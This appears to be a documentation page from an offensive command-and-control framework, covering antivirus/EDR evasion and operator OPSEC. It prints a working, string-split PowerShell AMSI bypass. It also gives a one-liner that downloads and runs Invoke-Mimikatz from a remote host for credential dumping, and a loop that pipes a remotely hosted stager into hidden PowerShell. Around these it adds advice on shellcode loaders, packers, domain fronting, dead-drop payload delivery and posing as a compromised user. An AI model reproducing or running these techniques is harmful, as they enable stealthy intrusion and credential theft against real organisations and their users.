Note on AV/EDR Evasion

The mbeubeu project does not claim to provide 100% undetectable payloads against all antivirus (AV) and endpoint detection and response (EDR) solutions. Similar to other C2 frameworks, mbeubeu is designed with interoperability in mind offering the flexibility to integrate with external tools and techniques focused on AV/EDR evasion.

For instance:

• The generated .exe payloads are packed using UPX, a common executable packer. While UPX can reduce signature detection in some cases, it is not a stealth method on its own.


• For advanced obfuscation and evasion, operators are encouraged to re-pack or re-encrypt binaries using tools like Veil-Evasion, PEzor, custom crypters, or use shellcode2exe From my github repo or The shellcodeLoader .


• The Ndobin-Shellcode*.bin files are raw shellcode representations of the payloads. These are intended to be used with custom shellcode loaders (written in C, C++, .NET, PowerShell, VBA, etc.) tailored to your evasion needs.

Ultimately, evasion is the operator's responsibility. mbeubeu provides the base payloads, but it's up to the operator to ensure their payloads are stealthy and appropriate for the target environment. AV/EDR evasion requires ongoing adaptation and creativity no framework alone can guarantee stealth.

OPSEC

Perfect OPSEC does not exist. A whoami at the wrong time is a beacon. Every action during an operation has a detection risk it’s just a matter of how loud it is, when you do it, and how you cover your tracks.

Even a simple whoami can trigger alerts in hardened environments if it's executed by a non-allowlisted process or at odd hours. Once you compromise a user, your access becomes your disguise. Your commands must reflect the role of the compromised user.
When someone outside IT runs ipconfig, the hunt starts. 👀

The AMSI bypass technique used in tools like `pwsploit` and `pwsh-execute` is simple yet powerful.

Traditional bypasses using Matt Graeber’s method (e.g., [Ref].Assembly.GetType(...)) are often detected by AMSI if executed on a single line.

However, by splitting the bypass into multiple lines and executing each line in the **same** PowerShell process, AMSI scanning is delayed until after the bypass takes effect.

Suppose your stager is hosted at: https://us.hospital.org/patients

Your remote script could include:

$a = [Ref].Assembly.GetType('Sys'+'tem.Manag'+'ement.Au'+'tomation.Am'+'siUtils')
$b = $a.GetField('ams'+'iInitF'+'ailed','NonP'+'ublic,St'+'atic')
$b.SetValue($null,$true)
iex (New-Object Net.WebClient).DownloadString('http://example.com/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "privilege::debug"
    

$file = (New-Object System.Net.WebClient).DownloadString('https://us.hospital.org/patients')
foreach ($line in $file) {
    $line | powershell -nop -w hidden
}
    

OPSEC Considerations

• execute-assembly is not OPSEC-safe it spawns a new suspended process. Instead, prefer bof_execute which is more stealthy (uses Beacon Object Files).


• Everything in the src folder can be statically modified to bypass signature-based detection engines.


• The Go-based stager can embed AMSI bypasses and obfuscate strings before compilation.


• Use domain fronting, legit CDN endpoints, and `dead drop resolvers` (e.g., pastebin, GitHub gists) for payload delivery.


• Monitor your own beacons with anomaly detection logic (e.g., beaconing too often, using wrong user-agent).


• Every command you type should mimic the role of your current session (Admin vs Helpdesk vs Intern).

Next: Development / FaaS